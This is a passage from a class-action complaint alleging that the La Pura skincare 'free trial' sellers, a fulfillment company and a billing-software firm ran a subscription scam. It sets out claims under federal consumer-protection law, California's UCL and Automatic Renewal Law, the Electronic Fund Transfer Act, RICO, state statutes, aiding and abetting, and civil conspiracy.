468.   Defendants' actions with respect to its products as described above are in violation of 21 U.S.C. § 301, *et seq*. and thus constitute unlawful business acts or practices under the UCL.

<div align="center">

**Unlawful Violations of the**

**Federal Trade Commission Act**

**15 U.S.C. § 41, *et seq*.**

</div>

469.   Pursuant to 15 U.S.C. § 45(a)(1), "[u]nfair methods of competition in or affecting commerce, and unfair or deceptive acts or practices in or affecting commerce, are hereby declared unlawful."

470.   Pursuant to 15 U.S.C. § 52(a), "[i]t shall be unlawful for any person, partnership, or corporation to disseminate, or cause to be disseminated, any false advertisement—(1) By United States mails, or in or having an effect upon commerce, by any means, for the purpose of inducing, or which is likely to induce, directly or indirectly the purchase of food, drugs, devices, services, or cosmetics; or (2) By any means, for the purpose of inducing, or which is likely to induce, directly or indirectly, the purchase in or having an effect upon commerce, of food, drugs, devices, services, or cosmetics."

471.   Defendant's products are both drugs and cosmetics.

472.   As described throughout this Complaint and in the First, Second, and Third Causes of Action, Defendants engaged in unfair methods of competition in or affecting commerce, as well as unfair or deceptive acts or practices in or affecting commerce. The act of selling their products online satisfies the requirement of "in or affecting commerce."

473.   As described throughout this Complaint and in the First, Second, and Third Causes of Action, Defendants disseminated false advertisements online and sold their products online, which satisfies the requirement of "in or affecting commerce." Those advertisements were intended to induce and did in fact induce the purchase of Defendants' products.

474.   Defendants' actions with respect to its products as described above are in violation of the Federal Trade Commission Act, 15 U.S.C. § 41, *et seq*. and thus constitute unlawful business acts or practices under the UCL.

### Unlawful Violations of Federal Trade Commission Regulations
### Concerning Use of the Word "Free" and Other Similar Representations
### 16 C.F.R. pt. 251, *et seq.*

475.   Defendants' acts and practices are unlawful under the California UCL because they violate Federal regulations governing the use of the word "free" and other similar representations in advertising.

476.   Pursuant to 16 C.F.R. pt. 251.1(a)(2), "[b]ecause the purchasing public continually searches for the best buy, and regards the offer of 'Free' merchandise or service to be a special bargain, all such offers must be made with extreme care so as to avoid any possibility that consumers will be misled or deceived."

477.   "[A] purchaser has a right to believe that the merchant will not directly and immediately recover, in whole or in part, the cost of the free merchandise or service by marking up the price of the article which must be purchased, by the substitution of inferior merchandise or service, or otherwise." 16 C.F.R. pt. 251.1(b).

478.   Because of this right, Federal regulations strictly limit the duration of any 'free' offers in any given trade area: "So that a 'Free' offer will be special and meaningful, a single size of a product or a single kind of service should not be advertised with a 'Free' offer in a trade area for more than 6 months in any 12-month period. At least 30 days should elapse before another such offer is promoted in the same trade area. No more than three such offers should be made in the same area in any 12-month period. In such period, the offeror's sale in that area of the product in the size promoted with a 'Free' offer should not exceed 50 percent of the total volume of his sales of the product, in the same size, in the area."

479.   On information and belief, Defendants advertised their false "free trial" or $0.00 price for more than six months from at least February 13, 2019 through the present time, and 100% of the sales were promoted with a "free" offer

480.   Offers labeled as "free" must comply with strict Federal disclosure regulations: "When making 'Free' or similar offers all the terms, conditions and obligations upon which receipt and retention of the 'Free' item are contingent should be set forth clearly and conspicuously at the outset of the offer so as to leave no reasonable probability that the terms of the offer might be misunderstood. Stated differently, all of the terms, conditions and obligations should appear in close conjunction with the offer of 'Free' merchandise or service. For example, disclosure of the terms of the offer set forth in a footnote of an advertisement to which reference is made by an asterisk or other symbol placed next to the offer, is not regarded as making disclosure at the outset." 16 C.F.R. pt. 251.1(c).

481.   Defendants failed to comply with these requirements to clearly and conspicuously disclose all terms, conditions, and obligations at the outset because on the try-la-pura-skincare.com/lm/ and try-la-pura-skincare.com/l3/ landing pages, the terms were not disclosed, false representations that the products would be free or cost $0.00 were made, and any disclosure of a subscription was buried on another web page in a lengthy terms of service.

482.   Defendants' actions with respect to its use of the word "free" as described above are in violation of 16 C.F.R. pt. 251, *et seq.* and thus constitute unlawful business acts or practices under the UCL.

### Unlawful Violations of Federal Law Governing
### Negative Option Marketing On The Internet
### 15 U.S.C. § 8403, *et seq.*

483.   Pursuant to 16 C.F.R. § 310.2, "[n]egative option feature means, in an offer or agreement to sell or provide any goods or services, a provision under which the

customer's silence or failure to take an affirmative action to reject goods or services or to cancel the agreement is interpreted by the seller as acceptance of the offer."

484.   Defendants utilize negative option features on their websites, offers, and agreements to sell their products because they purport to sign consumers up for a "free trial," and then interpret that as acceptance of a paid subscription if the consumer does not cancel shortly thereafter.

485.   Pursuant to 15 U.S.C. § 8403, "[i]t shall be unlawful for any person to charge or attempt to charge any consumer for any goods or services sold in a transaction effected on the Internet through a negative option feature (as defined in the Federal Trade Commission's Telemarketing Sales Rule in part 310 of title 16, Code of Federal Regulations), unless the person—(1) provides text that clearly and conspicuously discloses all material terms of the transaction before obtaining the consumer's billing information; (2) obtains a consumer's express informed consent before charging the consumer's credit card, debit card, bank account, or other financial account for products or services through such transaction; and (3) provides simple mechanisms for a consumer to stop recurring charges from being placed on the consumer's credit card, debit card, bank account, or other financial account."

486.   Defendants failed to follow any of these requirements, and in fact made it as difficult as possible to cancel the subscription, as described herein.

487.   Defendants' actions with respect to its products as described above are in violation of Federal law governing negative option marketing on the Internet, 15 U.S.C. § 8403, *et seq*. and thus constitute unlawful business acts or practices under the UCL.

### Injury from Defendants' Unlawful Actions

488.   To extend that the unlawful conduct described above was based on misrepresentations, deception, or omission, Defendants knew, or by the exercise of reasonable care should have known, that their representations and omissions were untrue

and misleading, and deliberately made the aforementioned representations and omissions in order to deceive reasonable consumers like Plaintiff and other Class Members.

489.    As a direct and proximate result of Defendants' unlawful conduct and unfair competition, Plaintiff and the other Class Members have suffered injury in fact and have lost money or property, time, and attention. Plaintiff reasonably relied upon Defendants' representations regarding their products. In reasonable reliance on Defendants' false representations, and as a result of Defendants' unlawful conduct and unfair competition, Plaintiff and other Class Members purchased the products at issue and paid more for those products than they would have had they been aware that Defendants' representations were false or had the Defendants not engaged in the unlawful and unfair conduct described herein. Plaintiff and other Class Members ended up with Products that were overpriced, inaccurately marketed, and did not have the characteristics, qualities, or value promised by Defendants, and therefore Plaintiff and other Class Members have suffered injury in fact.

490.    As purchasers and consumers of Defendants' Products, and as members of the general public who purchased and used the Products and have suffered injury in fact and lost money and property as a result of this unfair competition and unlawful conduct, Plaintiff and the Class are entitled to and bring this class action seeking all available remedies under the UCL.

491.    The unfair and unlawful competitive practices described herein present a continuing threat to Plaintiff and the Class Members in that Defendants persist and continue to engage in these practices, and will not cease doing so unless and until forced to do so by this Court. Defendants' conduct will continue to cause irreparable injury to consumers unless enjoined or restrained. Under Business & Professions Code § 17203, Plaintiff is entitled to injunctive relief ordering Defendants to cease their unfair competitive practices, and Plaintiff and all Class Members are entitled to restitution of the entirety of the Defendants' revenues associated with their unlawful acts and practices, or such portion of those revenues as the Court may find equitable.

## FIFTH CAUSE OF ACTION

## Violation of the California Automatic Renewal Law
## Cal. Bus. & Prof. Code §§ 17600, *et seq.*

492.   Plaintiff incorporates all preceding and subsequent paragraphs by reference as if set forth fully herein.

493.   Plaintiff brings this claim individually and on behalf of the Class.

494.   Pursuant to California Business and Professions Code section 17600, *et seq.*, "[i]t is the intent of the Legislature to end the practice of ongoing charging of consumer credit or debit cards or third party payment accounts without the consumers' explicit consent for ongoing shipments of a product or ongoing deliveries of service."

495.   California Business and Professions Code section 17602 prohibits "any business that makes an automatic renewal or continuous service offer to a consumer in this state" from engaging in certain activities.

496.   Pursuant to California Business and Professions Code section 17602(a)(1), it is unlawful for such a business to "[f]ail to present the automatic renewal offer terms or continuous service offer terms in a clear and conspicuous manner before the subscription or purchasing agreement is fulfilled and in visual proximity… to the request for consent to the offer."

497.   Pursuant to California Business and Professions Code section 17602(a)(1), if an automatic renewal offer "also includes a free gift or trial, the offer shall include a clear and conspicuous explanation of the price that will be charged after the trial ends or the manner in which the subscription or purchasing agreement pricing will change upon conclusion of the trial."

498.   Pursuant to California Business and Professions Code section 17601(c), "'Clear and conspicuous' or 'clearly and conspicuously' means in larger type than the surrounding text, or in contrasting type, font, or color to the surrounding text of the same size, or set off from the surrounding text of the same size by symbols or other marks, in a manner that clearly calls attention to the language."

499.   Pursuant to California Business and Professions Code section 17602(a)(2), it is unlawful for a business to "[c]harge the consumer's credit or debit card, or the consumer's account with a third party, for an automatic renewal or continuous service without first obtaining the consumer's affirmative consent to the agreement containing the automatic renewal offer terms or continuous service offer terms, including the terms of an automatic renewal offer or continuous service offer that is made at a promotional or discounted price for a limited period of time."

500.   Pursuant to California Business and Professions Code section 17602(b), "[a] business that makes an automatic renewal offer or continuous service offer shall provide a toll-free telephone number, electronic mail address, a postal address if the seller directly bills the consumer, or it shall provide another cost-effective, timely, and easy-to-use mechanism for cancellation that shall be described in the acknowledgment specified in paragraph (3) of subdivision (a)."

501.   Pursuant to California Business and Professions Code section 17602(c), "a consumer who accepts an automatic renewal or continuous service offer online shall be allowed to terminate the automatic renewal or continuous service exclusively online, which may include a termination email formatted and provided by the business that a consumer can send to the business without additional information."

502.   Defendants violated the provisions of this statute, as described herein. They failed to inform consumers in a conspicuous manner or in visual proximity to the request for consent to the offer that they were signing up for an automatic renewal subscription. The Defendants further violated the statute by making cancellation of the subscriptions as difficult as possible, including by using tactics such as placing customers on hold for lengthy periods of time or otherwise being difficult with them on telephone calls, by failing to provide an easy method of cancellation, and by using their "false front" website to deceive customers and their banks into thinking there had been an agreement to a terms of service to which the victims never agreed.

503.   Plaintiff and the Class were injured by these violations because their bank accounts or credit cards were automatically billed without their permission and in violation of the statute. As a result, they lost money and were charged for products they never agreed to purchase.

504.   Plaintiff and the Class seek all available damages under this statute, including full refunds for any automatic billing and an injunction barring the Defendants from automatically billing any other customers of any product or automatically shipping any products to customers in the future absent compliance with the statute.

<div align="center">

**SIXTH CAUSE OF ACTION**

**Violation of 15 U.S.C. § 1693e**

**of the Electronic Fund Transfer Act**

</div>

505.   Plaintiff incorporates all preceding and subsequent paragraphs by reference as if set forth fully herein.

506.   Plaintiff brings this claim on behalf of the Class.

507.   15 U.S.C. § 1693e(a) provides that a "preauthorized" electronic fund transfer from a consumer's account may be "authorized by the consumer only in writing, and a copy of such authorization shall be provided to the consumer when made."

508.   15 U.S.C. § 1693a(10) provides that the term "preauthorized electronic fund transfer" means "an electronic fund transfer authorized in advance to recur at substantially regular intervals."

509.   Section 1005.10(b) of Regulation E, 12 C.F.R. § 1005.10(b), provides that "[p]reauthorized electronic fund transfers from a consumer's account may be authorized only by a writing signed or similarly authenticated by the consumer. The person that obtains the authorization shall provide a copy to the consumer."

510.   Section 1005.10 of the Consumer Financial Protection Bureau's Official Staff Commentary to Regulation E, 12 C.F.R. § 1005.10(b), cmt. 5, Supp. I, provides that "[t]he authorization process should evidence the consumer's identity and assent to the authorization." The Official Staff Commentary to Regulation E further provides that "[a]n

authorization is valid if it is readily identifiable as such and the terms of the preauthorized transfer are clear and readily understandable." 12 C.F.R. § 1005.10(b), cmt. 6, Supp. I.

511.   On information and belief, Defendants debited consumers' bank accounts on a recurring basis without obtaining a written authorization signed or similarly authenticated writing from consumers for preauthorized electronic fund transfers from their accounts, thereby violating Section 907(a) of the EFTA, 15 U.S.C. § 1693e(a), and Section 1005.10(b) of Regulation E, 12 C.F.R. § 1005.10(b).

512.   Further, on information and belief, Defendants debited consumers' bank accounts on a recurring basis without providing a copy of written authorization signed or similarly authenticated writing by the consumer for preauthorized electronic fund transfers from the consumer's account, or without providing clear and readily understandable terms of the preauthorized transfer, thereby violating Section 907(a) of the EFTA, 15 U.S.C. § 1693e(a), and Section 1005.10(b) of Regulation E, 12 C.F.R. § 1005.10(b).

513.   Pursuant to 15 U.S.C. §1693m(a), Defendants are civilly liable to all injured victims of the class for these violations.

514.   Plaintiff and the Class seek all available damages under this statute, including full refunds for any automatic billing, an injunction barring the Defendants from automatically billing any other customers of any product or automatically shipping any products to customers in the future absent compliance with the statute, costs, reasonable attorney's fees, and statutory penalties.

<div align="center">

**SEVENTH CAUSE OF ACTION**

**Violation of the Racketeer Influenced and**

**Corrupt Organizations Act ("RICO")**

**18 U.S.C. §§ 1961, *et seq.***

**(All Defendants)**

</div>

515.   Plaintiff incorporates all preceding and subsequent paragraphs by reference as if set forth fully herein.

516.   Plaintiff brings this claim individually and on behalf of the Class under the Racketeer Influenced and Corrupt Organizations Act ("RICO"), 18 U.S.C. §§ 1961, *et seq.*, on behalf of themselves and the Classes against all Defendants.

517.   18 U.S.C. § 1962(c) provides that "[i]t shall be unlawful for any person employed by or associated with any enterprise engaged in, or the activities of which affect, interstate or foreign commerce, to conduct or participate, directly or indirectly, in the conduct of such enterprise's affairs through a pattern of racketeering activity or collection of unlawful debt."

518.   18 U.S.C. § 1962(d) provides that "[i]t shall be unlawful for any person to conspire to violate any of the provisions of subsection (a), (b), or (c) of this section."

519.   Defendants have committed violations of these sections, as described in further detail below.

520.   Defendants are "persons" within the meaning of 18 U.S.C. § 1961(3), which defines a person as "any individual or entity capable of holding a legal or beneficial interest in property."

521.   The overall La Pura scam constitutes an "enterprise" within the meaning of 18 U.S.C. § 1961(4), which defines an enterprise as "any individual, partnership, corporation, association, or other legal entity, and any union or group of individuals associated in fact although not a legal entity."  As described herein, all of the Defendants are individuals and legal entities who associated in fact to comprise and operate the La Pura scam (the "Overall Enterprise"). The Overall Enterprise consists of all Defendants.

522.   Defendants agreed to—and did—operate the Overall Enterprise through a pattern of racketeering activity. Defendants conducted the Overall Enterprise's affairs through illegal acts, specifically, multiple related acts of mail fraud, wire fraud, and bank fraud, as described in the Fourth Cause of Action herein.

523.   The shell company La Pura Defendants constitute an "enterprise" within the meaning of 18 U.S.C. § 1961(4) because they are corporations ("the La Pura Enterprise") and are associated in fact. They were operated by the John Doe individual defendants who

created these companies as an enterprise in violation of RICO. These John Doe(s) conducted the affairs of this corporation through illegal acts, namely the mail fraud, wire fraud, and bank fraud described herein. The La Pura Enterprise consists of Defendants Total Health Supply TUA Inc.; DL Group Inc.; Beautiful Skin and Health SL, Inc.; Beauty and Balance LV, Inc.; Coastal Beauty Care KV, Inc.; Coastal Health & Body TML, Inc.; Coastal Skin Care DC, Inc.; Complete Beautiful Skin DT, Inc.; Complete Dietary Health DT Inc.; Diet and Beauty Enterprise JB, Inc.; Diet Focus MG, Inc.; Dietary 8 Leaves TL, Inc.; Dietary Care Group MK, Inc.; Dietary Health DL, Inc.; Dietary Health Management SL, Inc.; Dietary Health Supplements ADN, Inc.; Dietary Mind & Body AR, Inc.; Dietary Pills TTH, Inc.; Dietary Supplements 8 Leaves TL, Inc.; Dietary Supplements NS, Inc; EM Strength & Wellness Products, Inc.; EW Ideal Health Store, Inc.; EW Radiant Skin Store, Inc.; Fit and Slim Body OLO, Inc.; Fit Body Forever KZ, Inc.; Fit Lifestyle Enterprise JD, Inc.; Fitness & Health Supplements PKL, Inc.; Flawless Beauty Forever MC, Inc.; Forever Beautiful Products KZ, Inc.; Forever Beauty and Balance JL, Inc.; Health & Body Care TN, Inc.; Health & Skin Nutrition JLN, Inc.; Health & Wellness Products EM, Inc.; Health and Diet Products ISA, Inc.; Health and Fitness Lifestyle JL, Inc.; Health Enterprise AR, Inc.; Health Enterprise LT, Inc.; Health Skin and Beauty Maya, Inc.; Health Skin and Body JB, Inc.; Healthy and Slim TT, Inc.; Healthy Beautiful Skin JD, Inc.; Healthy Body & Balance CD, Inc.; Healthy Fit Lifestyle DC, Inc.; Healthy Leaves TL, Inc.; Healthy Lifestyle Diet JL, Inc.; Healthy Skin Group TQH, Inc.; Healthy Skin Lifestyle JB, Inc.; Healthy Supplements Maya, Inc.; Ideal Skin & Health Care NA, Inc.; Lasting Fitness & Beauty JLN, Inc.; PKL Everlasting Beauty, Inc.; Radiant Skin & Body Shop ATN, Inc.; Remarkable Beauty TN, Inc.; Remarkable Health Supply PO, Inc.; Select Skin Products MV, Inc.; Skin and Beauty NS, Inc.; Skin Beauty & Health JN, Inc.; Skin Beauty and Balance CD, Inc.; Skin Beauty Enterprise MG, Inc.; Skin Beauty Products ISA, Inc.; Skin Care Enterprise TTH, Inc.; Skin Care Group MK, Inc.; Skin Products Rubio, Inc.; Strength & Fitness Lifestyle LT, Inc.; Total Fitness & Health MC, Inc.; and Vibrant Face & Beauty

Shop ATN, Inc., as well as any unknown John Doe shell companies used by the La Pura Defendants as part of the scheme.

524. The John Doe(s) who created the La Pura Enterprise agreed to—and did—operate the La Pura Enterprise through a pattern of racketeering activity. These Defendants conducted the La Pura Enterprise's affairs through illegal acts, specifically, multiple related acts of mail fraud, wire fraud, and bank fraud, as described in the Fourth Cause of Action herein, as well as conspiring to commit mail fraud, wire fraud, and bank fraud.

525. QuickBox, LLC and Quick Holdings LLC ("the QuickBox Enterprise) constitute an "enterprise" within the meaning of 18 U.S.C. § 1961(4) because they are limited liability companies and are associated in fact.

526. QuickBox's executive management team—Defendants Stephen Adele, Chad Biggins, and James Martel—conducted the QuickBox Enterprise's affairs through illegal acts, specifically multiple related acts of mail fraud and wire fraud, as described in the Fourth Cause of Action herein, as well as by conspiring to commit mail fraud, wire fraud, and bank fraud.

527. Konnektive LLC, Konnektive Corporation, Martorano Holdings LLC, and Konnektive Rewards LLC ("the Konnektive Enterprise") constitute an "enterprise" within the meaning of 18 U.S.C. § 1961(4) because they are limited liability companies and are associated in fact.

528. Konnektive's executive management team comprised of Defendants Matthew Martorano and Kathryn Martorano conducted Konnektive's affairs through illegal acts, specifically, multiple related acts of bank fraud as described in the Fourth Cause of Action herein, as well as by conspiring to commit mail fraud, wire fraud, and bank fraud.

529. Defendants conspired to commit and agreed to the commission of at least two predicate acts.

530. 18 U.S.C. § 1961(1) defines racketeering activity to include "any act which is indictable under any of the following provisions of title 18, United States Code... section

1341 (relating to mail fraud), section 1343 (relating to wire fraud), section 1344 (relating to bank fraud)....”

531.   18 U.S.C. § 1961(1) defines a pattern of racketeering activity as “at least two acts of racketeering activity, one of which occurred after the effective date of this chapter and the last of which occurred within ten years (excluding any period of imprisonment) after the commission of a prior act of racketeering activity.”

532.   The John Doe individual La Pura Defendants committed numerous acts of mail fraud, wire fraud, and bank fraud from at least early February 2019 to the present, as alleged in the Fourth Cause of Action herein and throughout the complaint. On information and belief, the enterprise was operating at least as of mid-2018, when the first of their shell companies was registered in Delaware, and it continues to operate.

533.   The La Pura Defendants first registered the try-la-pura-skincare.com website—where Defendants’ landing pages lured victims to purchase the La Pura products—in early February 2019.  This is consistent with the earliest negative customer review on the Better Business Bureau website, where the victim reported purchasing a La Pura trial product on April 5, 2019.  Moreover, on information and belief, the La Pura Defendants registered the La Pura “false front” website (https://www.la-pura-skinproducts.com/) used to defraud the banks and credit card companies on or about February 21, 2019.

534.   The predicate acts of mail fraud and wire fraud as described herein all had a common purpose to defraud victims purchasing the La Pura “free trial” products, that the victims were directed to the La Pura landing pages, which advertised their products as “free” and did not disclose the terms and conditions of the auto-enrollment subscription, that the victims were auto-enrolled in expensive monthly subscriptions without their knowledge or consent, and the victims were not provided a full refund. These acts occurred over a period of multiple years and the methods were the same or similar. Each sale to a victim of the La Pura scam constitutes bank fraud, wire fraud, and mail fraud. Each instance in which the La Pura Defendants showed a “false front” to a financial institution (whether

to obtain approval for a merchant account or to dispute a chargeback) further constitutes the predicate acts of wire fraud and bank fraud.

535.   On information and belief, many individuals are still being billed and shipped La Pura products on a monthly basis for products they purchased based on past acts of fraud, the deceptive websites are still operative, and many of the misrepresentations are actively being made to new customers. On information and belief, additional predicate acts may have occurred far earlier and may be uncovered in discovery, particularly through the La Pura Defendants' sales of earlier similar products.

536.   Defendants Stephen Adele, Chad Biggins, and James Martel caused the QuickBox Enterprise to commit numerous acts of mail fraud and wire fraud since the time of QuickBox's precursor company, 2Chads, which was founded in 2004, and have continued to assist the Doe Defendants in perpetrating the La Pura Enterprise's scam since its inception in or about February 2019. On information and belief, and based on the evidence described herein, Defendants Stephen Adele, Chad Biggins, and James Martel were aware of the predicate acts and conspired to commit and agreed to the commission of at least two predicate acts. The QuickBox Defendants directly committed mail and wire fraud by shipping the La Pura Products to victims through the mail, despite knowing that those shipments were being made in support of a fraudulent scheme, and by processing customer returns through mail and wire. As described further herein, Defendants Stephen Adele, Chad Biggins, and James Martel caused the QuickBox Enterprise to consult on a routine basis for companies running fraudulent "free trial scams," and caused the company to provide a menu of services enabling that fraud which was used to further the predicate acts committed by the La Pura Defendants. They conspired to commit mail fraud, wire fraud, and bank fraud because they knew that the La Pura Defendants were committing those predicate acts and intentionally assisted them in doing so.

537.   Defendants Matthew Martorano and Kathryn Martorano caused the Konnektive Enterprise to commit numerous acts of bank fraud because they developed specialized software to enable their clients—the scammers—to auto-bill their victims and

to "load balance" for the purpose of avoiding fraud detection by their victims' credit card companies and banks. The Konnektive Defendants have assisted the Doe Defendants in perpetrating the La Pura Enterprise's scam since its inception in or about February 2019. They created their load balancing functionality at least as early as 2012, and since then have continued to sell this software to known free trial scammers, to market it to those scammers at conferences, and to upgrade and maintain the software in order to assist free trial scammers in running their scams more effectively and in avoiding detection. Each sale of the Konnektive software to a known Internet scammer constitutes a predicate act, as well as any acts of maintenance or support of that software. The development of the load balancing functionality further constitutes a predicate act because the feature was specifically intended to automate bank fraud.

538.   On information and belief, the Doe Defendants behind the La Pura Enterprise consulted with the QuickBox Defendants and the Konnektive Defendants on a routine basis, and both the QuickBox Defendants and the Konnektive Defendants provided a menu of services enabling the Doe Defendants to further commit the predicate acts.   On information and belief, these activities also occurred as early as  February 2019 through the present.

539.   Defendants' acts of wire fraud, mail fraud, and bank fraud were committed willfully and intentionally as described herein, and were made in furtherance of the scheme and common course of conduct in that they were designed to defraud customers of the La Pura Products of money and property.

540.   The predicate acts by the Defendants affected interstate commerce, in that the shipments crossed state lines and the advertisements were transmitted via wire across the country, resulting in purchases of the La Pura Products through interstate commerce which were sent via United States mail.

541.   The RICO violations alleged here have caused harm to a specific business or property interest. In particular, as a result of the misrepresentations and omissions described herein, Plaintiff reasonably relied upon Defendants' representations regarding

their products. In reasonable reliance on Defendants' false representations, and as a result of the RICO violations, Plaintiff and other Class Members purchased the products at issue and paid more for those products than they would have had they been aware that Defendants' representations were false or had the Defendants not engaged in the unlawful conduct described herein. Plaintiff and other Class Members ended up with Products that were overpriced, inaccurately marketed, and did not have the characteristics, qualities, or value promised by Defendants, and therefore Plaintiff and other Class Members have suffered specific harm to a property interest, the money they paid to the Defendants. Plaintiff's banks were further harmed through the "false front" websites and the churning of merchant accounts.

542.   The RICO violations here have caused concrete financial loss. In particular, as described above, money was paid by Plaintiff and members of the Classes to the Defendants in reliance on their misrepresentations and omissions. Plaintiff and the Class Members were overcharged for those products relative to their actual value, and the value was substantially inflated by the various misrepresentations and omissions as described further herein.

543.   The RICO violations were both the but-for cause and the proximate cause of these injuries. But for the violations, as described herein, Plaintiff and the Class Members would not have purchased the products or would not have paid an inflated price for them. But for the bank fraud, the scheme would have been shut down by the banks or credit card companies. The violations were the proximate cause of these injuries because the violations led directly to the injuries—the fraudulent representations and omissions were designed to induce customers to purchase the La Pura Products, and it was because of these representations and omissions that the customers made their purchases.

544.   Because of these violations and pursuant to 18 U.S.C. § 1964(c) and 1964(d), Defendants are liable to Plaintiff and the Class Members for three times the damages Plaintiff and the Class Members have sustained, plus the cost of this suit, including reasonable attorneys' fees.

## EIGHTH CAUSE OF ACTION

### Violation of Various State Consumer Protection Laws

### On Behalf of the Nationwide Class

545.   Plaintiff incorporates all preceding and subsequent paragraphs by reference as if set forth fully herein.

546.  Plaintiff brings this claim for deceptive acts and practices in violation of various states' consumer protection statutes against the Defendants on behalf of the Nationwide Class.

547.  The Defendants have engaged in deceptive acts and unfair practices that have caused actual damages to Plaintiff and the Nationwide Class, as described herein, including the misrepresentations and omissions described with respect to the marketing, advertising, promotion, packaging, and sale of the La Pura Products.

548.  The Defendants' deceptive and unfair trade practices have been carried out in the course of conducting the Defendants' business, trade, and commerce.

549.  The Defendants' acts—including their intentional efforts to mislead consumers regarding the benefits and effectiveness of the La Pura Products—are willful, unfair, unconscionable, deceptive, contrary to public policy and injurious to consumers.

550.  The Defendants' false, deceptive and misleading statements and omissions would be material to any reasonable consumer's decision whether to buy an Immortelle product.

551.  Any objectively reasonable consumer acting reasonably in the circumstances would have been deceived by the Defendants' acts and practices.

552.  The Defendants' acts are unconscionable and actuated by bad faith, lack of fair dealing, actual malice, are accompanied by a wanton and willful disregard for consumers' well-being, and are motivated solely by the desire for financial gain.

553.  As a direct and proximate result of the Defendants' deceptive practices, Plaintiff and the Nationwide Class have sustained actual damages.

554.  Plaintiff and the Nationwide Class demand damages, attorneys' fees and costs,

and any other relief to which they may be entitled.

555.   Plaintiff's claims are representative of similar claims available to non-California Nationwide Class members under the laws of other states, which also are amenable to further subclass treatment. Such laws may include, but are not limited to: Ala. Code § 8-19-1 *et seq.*; Alaska Stat. § 45.50.471 *et seq.*; Ariz. Rev. Stat. Ann. § 44-1521 *et seq.*; Ark. Code Ann. § 4-88-101 *et seq.*; Cal. Civil Code § 1750 *et seq.* and Cal. Bus. & Prof. Code § 17200 *et seq. & 17500 et seq.*; Colo. Rev. Stat. § 6-1-101 *et seq.*; Conn. Gen. Stat. § 42-110a *et seq.*; Del. Code Ann. tit. 6 § 2511 *et seq. & 2580 et seq.*; D.C. Code Ann. § 28-3901 *et seq.*; Fla. Stat. § 501.201 *et seq.*; Ga. Code Ann. § 10-1-390 *et seq.*; Haw. Rev. Stat. § 480-1 *et seq.*; Idaho Code Ann. § 48-601 *et seq.*; 815 Ill. Comp. Stat. 505/1 *et seq.*; Ind. Code Ann. § 24-5-0.5-1 *et seq.*; Iowa Code § 714.16 *et seq.*; Kan. Stat. Ann. § 50-623 *et seq.*; Ky. Rev. Stat. Ann. § 367.110 *et seq.*; La. Rev. Stat. Ann. § 51:1401 *et seq.*; Me. Rev. Stat. Ann tit. 5, § 205-A *et seq.*; Md. Code Ann., Com. Law § 13-101 *et seq.*; Mass. Gen. Laws ch. 93A, § 1 *et seq.*; Mich. Comp. Laws § 445.901 *et seq.*; Minn. Stat. § 831 and § 325F.67 *et seq.*; Miss. Code Ann. § 75-24-1 *et seq.*; Mo. Ann. Stat. § 407.010 *et seq.*; Mont. Code Ann. § 30-14-101 *et seq.*; Neb. Rev. Stat. Ann. § 59-1601 *et seq.*; Nev. Rev. Stat. Ann. § 598.0903 *et seq.*; N.H. Rev. Stat. Ann. § 358-A:1 *et seq.*; N.J. Stat. Ann. § 56:8-1 *et seq.*; N.M. Stat. § 57-12-1 *et seq.*; N.Y. Gen. Bus. Law § 349 *et seq.* and § 350 *et seq.*; N.C. Gen. Stat. § 75-1.1 *et seq.*; N.D. Cent. Code § 51-12-01 *et seq.* and § 51-15-01 *et seq.*; Ohio Rev. Code Ann. § 1345.01 *et seq.*; Okla. Stat. tit. 15, § 751 *et seq.*; Or. Rev. Stat. § 646.605 *et seq.*; 73 Pa. Stat. Ann. §§ 201-1 *et seq.*; R.I. Gen. Laws §§ 6-13.1-1 *et seq.*; S.C. Code Ann. § 39-5-10 *et seq.*; S.D. Codified Laws § 37-24-1 *et seq.*; Tenn. Code Ann. § 47-18-1091 *et seq.*; Tex. Bus. & Com. Code Ann. § 17.41 *et seq.*; Utah Code Ann. § 13-11-1 *et seq.*; Vt. Stat. Ann. tit. 9, § 2451 *et seq.*; Va. Code Ann. §§ 59.1-196 *et seq.*; Wash Rev. Code § 19.86.010 *et seq.*; W. Va. Code § 46A-6-101 *et seq.*; Wis. Stat. § 100.18 *et seq.*; and Wyo. Stat. Ann. §§ 40-12-101 *et seq.*

## NINTH CAUSE OF ACTION

### Aiding and Abetting

556. Plaintiff incorporates all preceding and subsequent paragraphs by reference as if set forth fully herein.

557. On information and belief, the QuickBox Defendants and the Konnektive Defendants knew that the tortious conduct alleged in this complaint was occurring and that it constituted a breach of duties to Plaintiffs. The QuickBox Defendants and the Konnektive Defendants had actual knowledge of the wrongful conduct described herein. It is widely known among these scammers and among the various companies that provide them aid and assistance that the Federal Trade Commission has branded these schemes illegal and is aggressively pursuing them.

558. The QuickBox Defendants and the Konnektive Defendants gave substantial assistance or encouragement to the other Defendants as described further herein.

559. The QuickBox Defendants and the Konnektive Defendants participated in this conduct for personal gain or in furtherance of their own financial advantage.

560. The QuickBox Defendants and the Konnektive Defendants are thus jointly and severally liable for the conduct alleged herein by all of the other Defendants.

561. Plaintiff expects that there will be multiple John Doe Defendants ultimately discovered to have participated in this scheme, and based on the BBB report, that they will be separate companies or individuals conspiring together. To the extent the tortious conduct alleged was not personally committed by them, the Defendants aided and abetted the tortious conduct alleged in this complaint by working together as a group (including affiliates, affiliate networks, and "crooked processors" who help evade fraud detection efforts by banks and credit card companies) to defraud consumers as described in the BBB report. *See* Ex. 1.

562. On information and belief, the John Doe Defendants knew that the tortious conduct alleged in this complaint constituted a breach of duties to Plaintiffs. The John Doe Defendants had actual knowledge of the wrongful conduct described herein.

563. The John Defendants participated in this conduct for personal gain or in furtherance of their own financial advantage.

564.   Each of the John Doe Defendants is thus jointly and severally liable for the conduct alleged herein by all of the other Defendants.

## TENTH CAUSE OF ACTION

## Civil Conspiracy

565.   Plaintiff incorporates all preceding and subsequent paragraphs by reference as if set forth fully herein.

566.   All of the Defendants (collectively, "the Conspirators") formed a conspiracy to commit the tortious and unlawful conduct described herein.

567.   On information and belief, there was an agreement among the Conspirators to commit those wrongful acts and to cooperate in furtherance of the commission of those wrongful acts. This agreement is implied by the conduct of the conspirators because of the common knowledge among these scammers that their conduct is illegal, because of their contracts with one another, because the fulfillment companies and "crooked processors" target this kind of scammer specifically to be their customers, and because of the nature of their close interaction as an economic unit.

568.   The Conspirators were aware of the conduct of each other, and specifically of its unlawful nature. The Conspirators agreed with one another that this conduct would be committed and intended that it be committed. It was in the Conspirators' interests that this conduct be committed because they were specifically financially compensated for their participation. The Conspirators' acted in furtherance of their own financial gain as evidenced by this compensation.

